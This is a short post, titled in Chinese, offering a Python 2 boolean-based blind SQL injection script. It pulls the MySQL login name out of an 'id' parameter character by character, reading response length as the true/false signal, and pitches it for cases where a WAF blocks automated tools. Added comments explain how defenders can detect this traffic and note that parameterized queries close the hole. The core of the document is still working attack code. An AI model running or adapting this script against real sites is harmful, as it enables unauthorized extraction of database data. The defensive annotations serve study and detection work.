MySQL布尔盲注脚本
当某个盲注点不能使用工具(一般有waf限制)的时候,可以使用这个脚本用于证明漏洞的存在
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import httplib
import time
import string
import sys
import random
import urllib
# Boolean-based blind SQL injection proof-of-concept (Python 2: print statement,
# httplib). It reads the MySQL login name (user()) one character per position
# by asking the server a yes/no question per candidate character and using the
# size of the HTTP response as the true/false oracle.
#
# NOTE(review): the page this was pasted from had lost all indentation; the
# nesting below is reconstructed from the control flow. The placement of
# conn.close() inside the inner loop is the most plausible reading — TODO confirm.
#
# Defender's view: this traffic is easy to characterise — up to ~40 requests
# per character position (one per entry in `payloads`), all from one
# User-Agent, each carrying `ascii(mid(lower(user()),N,1))=M` inside the `id`
# parameter, with the attacker only comparing response length. Parameterized
# queries remove the injection point this depends on; request-rate and
# response-size anomaly detection catch the enumeration pattern itself.

# Single fixed User-Agent sent with every request (a useful detection pivot).
headers = {'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63',}
# Candidate character set tried at each position, in this order; user() is
# lower-cased in the payload, so only lowercase letters are tried.
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
print 'start to retrive MySQL user:'
user = ''
# Positions 1..20 of the user() string (MySQL mid() is 1-indexed).
for i in range(1,21):
    for payload in payloads:
        conn = httplib.HTTPConnection('www.example.com', timeout=4) # connection, host
        # One boolean question: "is the i-th character of lower(user()) equal to payload?"
        s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload)) # payload
        # The question is appended to the `id` parameter as a raw, unencoded query string.
        conn.request(method='GET',url="/php/1.php?id=1 and %s" % s,headers = headers) # url
        html_header= conn.getresponse().read()
        length=len(html_header)
        # Oracle: a "true" condition is assumed to return the full (>10000 byte)
        # page, a "false" one a smaller page. The threshold is hard-coded for
        # the target page and is not derived from a calibration request.
        if length>10000:
            user+=payload
            sys.stdout.write('\r[In progress] %s' % user)
            sys.stdout.flush()
            # Character found: move to the next position. Note that breaking
            # here skips conn.close() below, so the matching connection is
            # left for the garbage collector to close.
            break
        else:
            print '.',
        conn.close()
# Positions whose character is not in `payloads` simply produce no match and
# the loop moves on, so the printed result can be shorter than the real name.
print '\n[Done]MySQL user is', user